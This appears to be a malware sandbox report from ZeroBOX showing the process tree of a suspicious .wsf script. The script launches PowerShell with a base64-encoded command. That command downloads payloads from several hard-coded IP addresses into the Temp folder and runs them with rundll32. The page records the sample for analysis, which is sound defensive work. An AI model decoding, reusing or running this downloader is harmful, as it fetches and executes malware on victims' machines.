popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\RP_April_Ahw(92).wsf

    1256

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQARQByAHkAdABoAHIAYQBlAGkAZABhAGUATQBvAGQAaQBmAHkAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQAzADEALgAxADEANwAuADMAMAAvAHIAbwBTAE8AZAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAOQAuADEANAA3AC4AMQA3ADcALwBvAFgAagBrAEQAZwB1AEsAWgBQAHcAcwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgA1ADkALgAxADcAMAAuADQAOAAvAE0AUwBlADMAagBNAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgAzAC4ANgA5AC4AMQAxADYALwBKAFEAUgBCAE8AcwBpAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMgAwADYALgA1ADMALgA0ADgALgAyADEALwBaAHgAbQAwAE8ATQBDAHMANwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAMwAuADIAMAAwAC4AMQA3AC4AMgAwADcALwB6AHgASgBkAGwAbABSAEsAbABKAEcALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIABpAG4AIAAkAEUAcgB5AHQAaAByAGEAZQBpAGQAYQBlAE0AbwBkAGkAZgB5ACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADkAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABVAG4AYQBsAGEAcgBtAGkAbgBnAGwAeQAuAEQAcgBvAG4AYQBnAGUALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="

      2156

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf